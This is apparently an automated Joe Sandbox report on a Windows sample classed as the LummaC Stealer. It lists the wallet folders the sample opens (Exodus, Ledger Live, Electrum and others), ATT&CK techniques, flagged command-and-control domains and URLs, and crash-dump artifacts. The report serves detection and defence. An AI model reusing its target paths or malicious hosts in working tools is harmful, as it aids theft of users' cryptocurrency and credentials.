      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		411
      Process Injection      		12
      Virtualization/Sandbox Evasion      		2
      OS Credential Dumping      		1
      System Time Discovery      		Remote Services1
      Screen Capture      		21
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		411
      Process Injection      		LSASS Memory151
      Security Software Discovery      		Remote Desktop Protocol1
      Archive Collected Data      		2
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Deobfuscate/Decode Files or Information      		Security Account Manager12
      Virtualization/Sandbox Evasion      		SMB/Windows Admin Shares3
      Data from Local System      		113
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
      Obfuscated Files or Information      		NTDS1
      Process Discovery      		Distributed Component Object Model2
      Clipboard Data      		Protocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials33
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      mkFOY01Gl5.exe68%ReversingLabsWin32.Trojan.Znyonm
      mkFOY01Gl5.exe71%VirustotalBrowse
      mkFOY01Gl5.exe100%AviraHEUR/AGEN.1317026
      mkFOY01Gl5.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      potterryisiw.shop2%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://upx.sf.net0%URL Reputationsafe
      https://potterryisiw.shop/piR100%Avira URL Cloudmalware
      https://potterryisiw.shop/apiA48)100%Avira URL Cloudmalware
      https://potterryisiw.shop/t100%Avira URL Cloudmalware
      ellaboratepwsz.xyzu0%Avira URL Cloudsafe
      https://potterryisiw.shop/pi100%Avira URL Cloudmalware
      https://potterryisiw.shop/api100%Avira URL Cloudmalware
      towerxxuytwi.xyzd0%Avira URL Cloudsafe
      foodypannyjsud.shop100%Avira URL Cloudmalware
      pedestriankodwu.xyz100%Avira URL Cloudmalware
      contintnetksows.shop100%Avira URL Cloudmalware
      https://potterryisiw.shop/api14%VirustotalBrowse
      potterryisiw.shop100%Avira URL Cloudmalware
      https://potterryisiw.shop/(q100%Avira URL Cloudmalware
      penetratedpoopp.xyz100%Avira URL Cloudmalware
      foodypannyjsud.shop2%VirustotalBrowse
      potterryisiw.shop2%VirustotalBrowse
      https://potterryisiw.shop/lli100%Avira URL Cloudmalware
      swellfrrgwwos.xyz100%Avira URL Cloudmalware
      pedestriankodwu.xyz1%VirustotalBrowse
      https://potterryisiw.shop/100%Avira URL Cloudmalware
      https://potterryisiw.shop/api44100%Avira URL Cloudmalware
      swellfrrgwwos.xyz1%VirustotalBrowse
      https://potterryisiw.shop/0%VirustotalBrowse
      penetratedpoopp.xyz1%VirustotalBrowse
      contintnetksows.shop2%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      potterryisiw.shop
      		188.114.96.3
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      ellaboratepwsz.xyzutrue
      • Avira URL Cloud: safe
      		unknown
      https://potterryisiw.shop/apifalse
      • 14%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      towerxxuytwi.xyzdtrue
      • Avira URL Cloud: safe
      		unknown
      foodypannyjsud.shoptrue
      • 2%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      pedestriankodwu.xyztrue
      • 1%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      contintnetksows.shoptrue
      • 2%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      potterryisiw.shoptrue
      • 2%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      penetratedpoopp.xyztrue
      • 1%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      swellfrrgwwos.xyztrue
      • 1%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://potterryisiw.shop/apiA48)RegAsm.exe, 00000004.00000002.2574481805.0000000000C10000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://potterryisiw.shop/tRegAsm.exe, 00000004.00000002.2574481805.0000000000BB3000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://potterryisiw.shop/piRegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://potterryisiw.shop/piRRegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      http://upx.sf.netAmcache.hve.7.drfalse
      • URL Reputation: safe
      		unknown
      https://potterryisiw.shop/(qRegAsm.exe, 00000004.00000002.2574481805.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://potterryisiw.shop/lliRegAsm.exe, 00000004.00000002.2574481805.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown
      https://potterryisiw.shop/RegAsm.exe, 00000004.00000002.2574481805.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2574481805.0000000000B8F000.00000004.00000020.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      https://potterryisiw.shop/api44RegAsm.exe, 00000004.00000002.2574481805.0000000000C10000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      188.114.96.3
      		potterryisiw.shopEuropean Union
      		13335CLOUDFLARENETUStrue

      General Information

      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1465097
      Start date and time:2024-07-01 09:22:27 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 11s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:14
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:mkFOY01Gl5.exe
      renamed because original name is a hash value
      Original Sample Name:0309dd0131150796ea99b30a62194fae.exe
      Detection:MAL
      Classification:mal100.troj.spyw.evad.winEXE@8/9@2/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 98%
      • Number of executed functions: 42
      • Number of non-executed functions: 80
      Cookbook Comments:
      • Found application associated with file extension: .exe

      Warnings

      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 52.182.143.212
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      03:23:50API Interceptor8x Sleep call for process: RegAsm.exe modified
      03:24:11API Interceptor2x Sleep call for process: WerFault.exe modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      188.114.96.3cL7A9wGE3w.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
      • 445798cm.nyashka.top/ProviderEternalLinephpRequestSecurePacketprocessauthwordpress.php
      http://www.youkonew.anakembok.de/Get hashmaliciousHTMLPhisherBrowse
      • www.youkonew.anakembok.de/cdn-cgi/challenge-platform/h/g/jsd/r/89b98144d9c843b7
      hnCn8gE6NH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
      • yenot.top/providerlowAuthApibigloadprotectflower.php
      288292021 ABB.exeGet hashmaliciousFormBookBrowse
      • www.oc7o0.top/2zff/?Hp=4L8xoD0W4Zo4sy87CvwWXXlmZfhaBYNiZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk6zzmBcbZOQR3Nr9VCMayuUBptQdoGcq8y485hKv0f5POEUdLprTAYpXY&5H=CtUlKhgP42a
      eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
      • www.liposuctionclinics2.today/btrd/?OR-TJfQ=g2Awi9g0RhXmDXdNu5BlCrpPGRTrEfCXfESYZTVa1wMirmNXITW5szlP5E4EhRYb22U+Mw==&2dc=kvXd-rKHCF
      Purchase Order -JJ023639-PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • filetransfer.io/data-package/9a4iHwft/download
      Techno_PO LV12406-00311.xla.xlsxGet hashmaliciousUnknownBrowse
      • qr-in.com/cpGHnqq
      Techno_PO LV12406-00311.xla.xlsxGet hashmaliciousUnknownBrowse
      • qr-in.com/cpGHnqq
      QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
      • filetransfer.io/data-package/ygivXnVx/download
      NGL 3200-Phase 2- Strainer.exeGet hashmaliciousFormBookBrowse
      • www.oc7o0.top/2zff/?oH=4L8xoD0W4Zo4sy87CvwWXXlmZfhaBYNiZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk7xznBNrfJyFZcb5vCPyKuUBo+l90Wdia8Y821KfsfreAbg==&ML=uVzXijwPkXTxAbN

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      potterryisiw.shop1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
      • 188.114.96.3

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      CLOUDFLARENETUSyUFX4wGvLW.elfGet hashmaliciousMirai, MoobotBrowse
      • 172.65.156.147
      https://yagyatech.com/netpaymemGet hashmaliciousUnknownBrowse
      • 172.64.155.119
      Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
      • 104.16.185.241
      fPqdDUeLwj.elfGet hashmaliciousMirai, MoobotBrowse
      • 1.4.38.60
      AGREEMENT AND APPROVAL REPORT AERODYNE- RN & FR OF 2024-50254_6.5.24.pdfGet hashmaliciousHTMLPhisherBrowse
      • 172.67.159.201
      92s4OjHVFf.exeGet hashmaliciousLummaCBrowse
      • 188.114.97.3
      scan19062024.exeGet hashmaliciousFormBookBrowse
      • 172.67.205.232
      Leadership Development.htmlGet hashmaliciousHTMLPhisherBrowse
      • 104.17.24.14
      Electronic Slip_ball.com.htmlGet hashmaliciousHTMLPhisherBrowse
      • 188.114.96.3
      6Z4Q4bREii.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
      • 188.114.97.3

      JA3 Fingerprints

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      a0e9f5d64349fb13191bc781f81f42e192s4OjHVFf.exeGet hashmaliciousLummaCBrowse
      • 188.114.96.3
      SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      Plata.docx.docGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      163.exeGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      https://sites.google.com/view/zinkfoodservicegroupinc/homeGet hashmaliciousHTMLPhisherBrowse
      • 188.114.96.3
      1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
      • 188.114.96.3
      PO-MISA-32493.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
      • 188.114.96.3
      External24.exeGet hashmaliciousRisePro StealerBrowse
      • 188.114.96.3
      test.exeGet hashmaliciousLummaCBrowse
      • 188.114.96.3

      Dropped Files

      No context

      Created / dropped Files

      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_c9bfd8d07f254ebe8912d43c52adf5e55266565a_e47d3db6_cc4100ba-9324-4e3f-bbf5-c9151601b391\Report.wer

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.0525382419946387
      Encrypted:false
      SSDEEP:192:C5EjjeFy/L+xDxf0BU/AjezEKTczuiF8Z24IO8Z:oEjtL+FKBU/AjeNczuiF8Y4IO8Z
      MD5:E78EF36D7541004A2B31A50E2604F593
      SHA1:68C69A69B98877BD31FB192D83EB6ADA83369FE8
      SHA-256:1F6D5D1CD4456FE3BEA61FC7973012B29B9B0808FDC128CEB58884F32792B5D6
      SHA-512:4B758C5B33B73D54C7866D276538CC01F6BB08F2CFD500014C4506B95780F10FAA15F557EED02BBEBF1A929323A428D0E36B0B892C44D710DBE518245DA6899B
      Malicious:false
      Reputation:low
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.2.9.2.2.4.1.5.3.0.8.5.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.2.9.2.2.4.2.0.3.0.8.5.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.4.1.0.0.b.a.-.9.3.2.4.-.4.e.3.f.-.b.b.f.5.-.c.9.1.5.1.6.0.1.b.3.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.3.3.4.d.2.a.-.0.9.8.e.-.4.9.c.5.-.9.8.7.9.-.8.d.0.e.4.e.5.a.b.e.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.0.-.0.0.0.1.-.0.0.1.4.-.9.f.e.e.-.5.f.9.4.8.7.c.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mkFOY01Gl5.exe_f17527364e8b6e37285ab788bb2a9768f98071_61a3bbc4_8792fd5b-a84f-4d64-8493-38f89d51577a\Report.wer

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.7141568706699232
      Encrypted:false
      SSDEEP:192:yMoSAUWOQl0BU/gjuGzuiF8Z24IO8LJL:8SAUWOQGBU/gjfzuiF8Y4IO8L
      MD5:4DD92C98AF76544D029865DBEC08EE85
      SHA1:AD328AC3C2533AA4A56F6D44CCBCF93E501864EC
      SHA-256:F2CBE1527262D637C015C18289EADD8E6364ABF7E8C574E2022222DB5AFA1934
      SHA-512:9B56473259E156EEC6708339DD7E4CADD2BC0C8DF33585F7AD8320A7C0269BE879AFC6BB45E78E8D3244293C7049C5C694DDA1C6CA900BFC381E3065690624D6
      Malicious:true
      Reputation:low
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.2.9.2.2.1.4.2.0.4.9.1.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.2.9.2.2.1.4.5.7.9.9.1.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.9.2.f.d.5.b.-.a.8.4.f.-.4.d.6.4.-.8.4.9.3.-.3.8.f.8.9.d.5.1.5.7.7.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.0.2.e.8.5.5.-.4.8.3.b.-.4.7.c.d.-.a.e.c.2.-.9.5.e.4.f.5.e.3.9.a.5.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.k.F.O.Y.0.1.G.l.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.a.8.-.0.0.0.1.-.0.0.1.4.-.b.c.5.5.-.f.c.9.3.8.7.c.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.d.6.e.e.8.c.c.d.9.b.e.7.5.1.5.1.f.b.e.7.e.f.3.8.6.0.5.8.9.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.2.d.f.6.e.3.3.4.7.0.8.e.a.e.8.1.0.a.7.4.b.8.4.4.f.d.5.7.e.1.8.e.9.f.d.c.3.4.c.d.!.m.k.F.O.Y.0.1.G.l.5...e.x.e.....T.a.r.g.e.t.A.p.p.

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E66.tmp.dmp

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 14 streams, Mon Jul 1 07:23:34 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):46170
      Entropy (8bit):1.7551058547418887
      Encrypted:false
      SSDEEP:96:528lJE7AwOa8UeSvgsi7X9UnjP97j5VKR9XcMFcoZFuRejWBb//04LKbWIkWIXpt:H8tvHOMHKzt0eCeWjfFlp60
      MD5:EBDF3DF5FC96E4314804B116E51DE50D
      SHA1:EBEFD2E60C1D5B4DF4A14F448F06399AF91AD181
      SHA-256:D39D0B1EFEED58E2CA55D6A9F7C5B10A91353AA4CBEDE15297DFEBFA0D358D9E
      SHA-512:4E96F8D0A62C59CBBDB9799F384291C88B22C996794A84AC69E0F07EFE6C55CC08A634D33A3B11716E5D3E47226D013A5DE3744D2CB6ADC6E76207715B98A7FA
      Malicious:false
      Reputation:low
      Preview:MDMP..a..... .......vY.f........................0...........d...n$..........T.......8...........T..........................,...........................................................................................eJ..............GenuineIntel............T...........tY.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3EC4.tmp.WERInternalMetadata.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8302
      Entropy (8bit):3.6998500413426703
      Encrypted:false
      SSDEEP:192:R6l7wVeJto6tpWX6YEI6SUH5NgmfeJDrpr089bRpsfCObm:R6lXJi6tW6YE1SUH5NgmfeJD3RCfCj
      MD5:EAFCA40006C6C316D90BEE485653765D
      SHA1:4DFA12C4883F817D7BC8F98FEC3B6438745FEE74
      SHA-256:AD230542FCB010F87101EC8B1A07AC2C1EFD74627CDCDC98C492A48B26F0B4D0
      SHA-512:1C83960C2548F44F929BD1A74D51A5F863796D7F04486967F44884F07E6F7E908B0C779474E4861F4D556E26AB8F299701D4E2AE9E93B4A3DF7B5A3F4EB8FB7B
      Malicious:false
      Reputation:low
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.5.6.<./.P.i.

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F23.tmp.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4585
      Entropy (8bit):4.465536815918837
      Encrypted:false
      SSDEEP:48:cvIwWl8zsyJg77aI9ROWpW8VYQ0Ym8M4Jp8fiFqFNDo+q8o80u0nW0ud:uIjfAI77v7VbJp8bF9o5Bu0nW0ud
      MD5:0B77D030B7EF4018AA735B7A93CF17AF
      SHA1:E8816154930087222CBEB3C0C20CCE8EED97E7D9
      SHA-256:ADBE23635D4ECD53D821FD2A3A4C238CAD0C53BD11BA10A276F76972FDB0ADCC
      SHA-512:278A539C5B6F12A77574F1810D184F47764FECE3B1C2CCEE96CD9EC6DFA6DBD744F1C414D37B010A21A4C5ABF8346A0DBDA8416FB36E7D41B4241FC54C99DA8D
      Malicious:false
      Reputation:low
